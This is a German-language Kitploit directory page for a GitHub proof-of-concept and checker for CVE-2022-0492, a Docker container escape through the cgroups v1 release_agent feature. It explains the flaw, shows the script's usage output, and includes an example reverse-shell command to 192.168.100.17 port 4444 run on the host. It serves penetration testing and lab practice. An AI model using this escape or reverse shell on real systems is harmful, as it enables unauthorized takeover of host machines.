Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-0492-Docker-Breakout-Checker-and-PoC — Docker-Breakout-Checker und PoC über CAP_SYS_ADMIN und über Benutzer-Namespaces (CVE-2022-0492) | Kitploit
Tools/GitHubGitHub/t1erno/cve-2022-0492-docker-breakout-checker-and-poc
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationPenetrationstestsCloud-SicherheitLernen & BildungContainer-AusbruchLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubt1erno/cve-2022-0492-docker-breakout-checker-and-poc

CVE-2022-0492-Docker-Breakout-Checker-and-PoC

Docker-Breakout-Checker und PoC über CAP_SYS_ADMIN und über Benutzer-Namespaces (CVE-2022-0492)

Repository anzeigen
818vor 3 JahrenNoch nicht geprüft

CVE-2022-0492 Docker-Ausbruch-Checker und PoC

Zusammenfassung

Um die Schwachstelle auszunutzen, muss der Angreifer Zugriff auf einen Docker-Container haben, der auf einem verwundbaren System läuft. Nach erfolgreicher Ausnutzung kann der Angreifer den Container verlassen und die vollständige Kontrolle über das Host-System erlangen.

Eine Schwachstelle wurde in der Funktion cgroup_release_agent_write im Linux-Kernel in kernel/cgroup/cgroup-v1.c gefunden. Dieser Fehler ermöglicht unter bestimmten Umständen die Nutzung des release_agent-Features von cgroups v1, um Privilegien zu erweitern und die Namespace-Isolation unerwartet zu umgehen.

Einfacher ausgedrückt: cgroups v1 verfügt über ein Feature namens release_agent, das ein Programm ausführt, wenn ein Prozess in der cgroup beendet wird. Wenn notify_on_release aktiviert ist, führt der Kernel das release_agent-Binary als root aus. Durch Bearbeiten der release_agent-Datei kann ein Angreifer sein eigenes Binary mit erweiterten Privilegien ausführen und die Kontrolle über das System übernehmen. Die release_agent-Datei gehört jedoch root, sodass nur ein Benutzer mit root-Zugriff sie ändern kann.

Verwendung

root@kitploit:~
# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

Beispiele

Hamlet von TryHackMe

Der Root-Benutzer auf dem Host-Rechner wurde geknackt, indem UFW deaktiviert und dann eine Reverse Shell gesendet wurde.

Misguided Ghosts von TryHackMe

Der Root-Benutzer auf dem Host-Rechner wurde geknackt, indem SUID auf bash gesetzt und ebenfalls eine Reverse Shell gesendet wurde.

Quellen:

  • https://github.com/puckiestyle/CVE-2022-0492
  • http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
Tool herunterladen